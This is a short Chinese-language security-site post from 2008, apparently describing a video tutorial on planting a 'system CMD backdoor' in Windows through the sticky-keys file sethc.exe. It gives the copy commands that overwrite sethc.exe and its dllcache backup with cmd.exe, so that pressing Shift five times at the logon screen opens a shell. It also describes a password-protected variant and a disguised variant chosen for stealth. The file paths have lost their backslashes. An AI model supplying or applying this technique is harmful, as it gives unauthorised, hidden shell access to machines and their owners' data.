投稿:打造系统CMD后门(工具)

ZDNet 安全频道频道 更新时间:2008-06-13 作者: 来源:SohuIT

本文关键词:CMD dllcache sethc

  动画性质: 无声演示



  录制工具: 屏幕录象专家



  游戏外挂:



  VIP 会员:



  动画评级:



  动画介绍:什么是sethc.exe:



  Windows操作系统里连续按下5次Shift键之后,会运行sethc.exe,打开粘置.



  在系統的具體位置:



  C:WINDOWSsystem32



  C:WINDOWSsystem32dllcache(這是一個備份目錄)



  1.普通的系统CMD后门:



  用系統cmd.exe替換sethc.exe



  copy "C:WINDOWSsystem32cmd.exe" "C:WINDOWSsystem32dllcachesethc.exe"



  copy "C:WINDOWSsystem32cmd.exe" "C:WINDOWSsystem32sethc.exe"



  注銷后按下5次Shift键 直接進入cmd



  2.加密码的另类系统CMD后门:



  先來看一個批處理 它的功能是加密cmd 密碼是數字+sunlei sunlei是可以隨便修改的



  把它編譯成一個exe的文件 替換原來的sethc.exe



  3.伪装版的另类系统CMD后门:



  這是一個經過改造的sethc.exe文件 先還是來替換下看下效果



  表面上看是一個正常的sethc.exe但是我們雙擊右下角就能彈出cmd窗口



  有一定的隱蔽性



  教程就做到這里 ~!

安全频道 CMD 最新报道

安全频道 dllcache 最新报道

[an error occurred while processing this directive]